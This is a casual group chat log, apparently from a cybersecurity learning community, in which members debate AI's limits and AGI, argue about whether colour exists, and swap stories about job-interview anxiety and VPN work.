Can you elaborate?

Assuming you’re just fine tuning it, yes

And a significantly better use of tech that’s actually all about pattern recognition

lab grown brain, it thinks like a living thing, it's made of biological material and it has intelligence

Even still, these are used in a consensus process. It’s not making decisions

Apparently AI cannot manage your security 😉

Just like our own inteligence. Humans thousands years ago: Me monke me want eat and sleep. Humans now I do not need to explain do I?

More of an aid.

That is extremely reductive

But that is how it works

You have no idea how complex our brains were even then

something need to be primitive and bad to be slowly improved and get better. Nothing is created good or perfect in the first place

For example, think for a moment why humans can see more shades of green than any other color

evolution and specialization

we were adapted to see predators in the foliage from a primal level

Colours don’t exist, they are just a perception of the brain

and even that task alone is something AI dramatically struggles with, despite advanced in AI image recognition

Non-sequitur…

If we can’t even simulate something we do without thinking in early human evolution, we are nowhere close to this sorta thing

Different wave lengths exists. Color being a representation of said wavelengths. It still exists. But sure the words we attribute to colors are purely arbitrary

That is because we are stupid and cannot make it learn better. But there was that experiment some time ago I forgot how it was called. To make it short scientists created AI with primary objective of communicating and learning. At first they were able to see how it communicated with each other but later it got so good at it that the speed of communication was better than any human made algorithm. The only issue was that scientists were no longer able to see what data was sent and recieved because for humans it was gibberish trash. They got scared and axed the project just in case.

Created by the brain though

The brain isn’t creating anything unless you are meaning hallucinations

you could also say that colours were always there waiting to be seen

and lots of other colours exist that we cant see

Not sure what point you're trying to make it here tbh

Physical properties of light aren’t colour

No, the color representation happens due to the rod and cones in our eyes (which are processed upside down I’ll remind you, and our brain flip that right side up and interpurts the color signals we recieved from the eye)

Think they're just arguing for the sake of it at this point.

Yep

wut is all I have to say

wait how did the topic go to this

I don’t know lmao

true but it is not color this are wavelengths that are translated by brain to colors. There is no color per se.

imho it’s always best to have a healthy skepticism about any new tech and to adopt it unquestionably is a mistake

I like debating about topics, I guess it’s a way of learning

So, no color, but how is this relevant to the ai discussion? Did I miss something or was it always about the arbitrary representation of color

i just really want AI to fail so we dont all run out of jobs lol

It's quite an old experiment where they had two AIs communicate with the task of optimizing language.
And, well, the AI optimized the language to a point where nobody was able to understand it anymore.

Skepticism also doesn’t mean “ignore facts you disagree with” it is how the scientific method works

But that was a couple years ago, lel.

But isn’t AI creating jobs?

I want it to suceed but at the same time not to lose job. AI is our only hope for survival.

Oh I am familiar with that but lol, I couldn’t be bothered to read the paragraph tbh

Fair.

i liked ai discussion

Net positive or net negative

you sure the higher ups wont just leave 99% of the popyulation to die when they get AGI?

no need for a work force when AI can do everything

AI will hopefully advance scientific studies, and either allow me to visit the moon or buy a flying car

thats called a helicopter

This argument goes back to the 1920s and ealier with automation, no we need staff to oversee the machines

They won't. Higher ups are stupid people with power. They need normal people like us to figure out stuff.

A helicopter to the moon? Or a flying helicopter car?

not with an AGI, it would be able to figure out everything

a flying car is a helicopter

what

Gishhhhhhgallop 🐎

How would these stupid people control AGI that would be several times smarter than humans?

lol we are nowhere near that point

They do not even know what VPN is

I have some experience with AW159’s and it’s not as fun as the idea of driving the delorean time machine

technically neither does AI, it can just regertigate info

AI doesn’t even know how to multiply

it’s just trying to give us results it “thinks” look correct

yet

how would anyone at this point

Well we shall see but that would require something beyond a LLM

but combine Worm with AI and you have self multiplying AI 😉

yipee

I remember in an interview I couldn’t explain the technical explanation of a VPN, despite knowing exactly what it is, having set them up, and using them all the time lol… proof that nerves can affect how you think

LLMs can’t do math because they were never designed to do so

Just hope that doesn’t happen in my interview next week

honestly same

just say tunnel a bunch of times and call it a day

That's me on every single interview for job. I know this stuff normally and when working even in stress too. But when I am at interview my brain forgets everything 😦

I’m glad you all agree with me lol, fucking hate interviews

Get the shakes sometimes too

But yep I maintain IPSec and SSL VPN stuff at work, and more for personal. I do think I’d be able to answer these questions on the spot as I’ve had to with third parties before

the only thing worse than working is getting a job

I do understand the anxiety though

I think it’s the questions you weren’t expecting to be asked that get you… you spend so much time preparing on the questions you want to get asked

what about those weird as fuck questions they sometimes ask

Then you just be honest and answered informed guesses baed on the knowledge you already have, whilst stating as such

I hate current job market. Jobs are scarce, only for seniors. Requirements are insane, salaries are meh, remote work almost dead, companies fire people (me included).

WhAts yOur bIggEst wEakNess

you know your character well enough 🤷‍♂️

I’m too dedicated to my work, and it seeps into my thoughts in my personal life

only half true lol

I don't mind interviews.

For me that’s pretty spot on

i interview surprisingly well

Had enough of them with THM.

Hearing this question

just gotta make em laugh a bit, bring down the formality a little level

That's how I finally met Ashu 😄

Mhmm some soft skills can work wonders taking the tension down

ive heard some companies are doing pre recorded interviews

I have to give a 5 minute presentation on why they should hire me

those must be hell

I changed my mind. My biggest weakness is lack of humor

bless you

thats dumb

Make a couple inappropriate jokes right off that bat so the only way it can go is up ⬆️

good luck

Yeah when you said presentation, I thoguht surely you don’t mean… [what you literally just stated]

Sadly, the timing was wrong and I had to turn down the job offer from TryHackMe.

THEY should give a five minute presentation on why they YOU should work for them

This is easy

turn the tables on the interviewer

"why should I work for YOU" 😂

Yep and I don’t even have SIEM experience 😄 so I created a PowerPoint presentation with a slide that just reads “Skills can be taught. Being a proactive thinker and positive mindset is something you either are or aren’t”